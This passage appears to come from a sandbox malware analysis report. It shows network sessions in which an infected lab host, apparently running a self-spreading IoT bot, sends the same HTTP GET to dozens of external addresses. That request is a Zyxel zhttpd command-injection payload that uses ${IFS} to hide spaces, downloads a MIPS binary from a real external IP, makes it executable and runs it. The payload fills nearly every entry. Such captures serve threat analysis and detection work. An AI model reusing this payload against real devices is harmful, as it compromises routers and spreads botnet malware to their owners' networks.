                                      Jan 19, 2024 17:29:19.505951881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      915192.168.2.145955687.170.233.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505975008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      916192.168.2.1448850216.3.23.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506006956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      917192.168.2.1459206218.195.157.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506057024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      918192.168.2.1459026112.245.73.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506118059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      919192.168.2.1448750216.41.32.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506131887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      920192.168.2.145343464.116.203.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506195068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      921192.168.2.1448070172.120.125.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506222010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      922192.168.2.144594661.155.251.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506279945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      923192.168.2.1460570104.56.24.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506314039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      924192.168.2.1449160165.198.203.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506351948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      925192.168.2.143725681.128.39.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506375074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      926192.168.2.143861081.139.236.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506408930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      927192.168.2.1460422104.213.88.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506453991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      928192.168.2.1451232116.15.78.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506494999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      929192.168.2.144676259.176.31.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506520033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      930192.168.2.1453460150.242.216.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506570101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      931192.168.2.1435052209.252.84.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506609917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      932192.168.2.1441856142.154.91.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506638050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      933192.168.2.145476819.207.203.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506666899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      934192.168.2.1453968112.10.116.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506719112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      935192.168.2.1439098196.231.234.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506741047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      936192.168.2.145361270.194.60.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506776094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      937192.168.2.145121267.35.147.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506799936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      938192.168.2.144532864.97.119.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506846905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      939192.168.2.1439462219.63.116.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506900072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      940192.168.2.1438528182.10.209.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506938934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      941192.168.2.1457016211.25.109.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.506994963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      942192.168.2.146086244.113.208.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507033110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      943192.168.2.146015868.198.193.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507056952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      944192.168.2.14579468.145.162.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507117033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      945192.168.2.1455900114.97.118.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507163048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      946192.168.2.145775013.74.208.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507186890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      947192.168.2.1445902177.203.94.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507240057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      948192.168.2.1440046102.176.170.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507260084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      949192.168.2.1437406112.97.194.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507318020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      950192.168.2.1436932143.22.52.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507339954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      951192.168.2.145105058.113.81.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507394075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      952192.168.2.144041446.84.30.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507421970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      953192.168.2.1454618130.231.146.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507477999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      954192.168.2.144031423.221.116.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507509947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      955192.168.2.1456924202.79.5.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507551908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      956192.168.2.144555270.11.97.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507576942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      957192.168.2.14550848.183.77.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507622004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      958192.168.2.143403236.194.244.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507657051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      959192.168.2.144714444.43.69.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507704973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      960192.168.2.1434796213.233.33.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507735014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      961192.168.2.1460292140.150.246.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507771015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      962192.168.2.1441066211.109.68.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507791996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      963192.168.2.1448820158.219.28.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507843018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      964192.168.2.1444160196.31.146.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507888079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      965192.168.2.1452656107.57.199.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507919073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      966192.168.2.144672865.221.233.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.507946014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      967192.168.2.1450318141.134.4.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508001089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      968192.168.2.144419438.30.185.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508029938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      969192.168.2.145847079.245.166.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508065939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      970192.168.2.1459260170.18.161.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508116961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      971192.168.2.1448100126.30.84.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508141994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      972192.168.2.145908219.58.116.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508179903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      973192.168.2.144695880.207.6.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508205891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      974192.168.2.144427485.153.155.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508238077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      975192.168.2.1444302121.18.252.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508294106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      976192.168.2.146090841.197.30.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508326054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      977192.168.2.144710249.72.25.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508347034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      978192.168.2.145639059.104.2.83443
                                      TimestampBytes transferredDirectionData
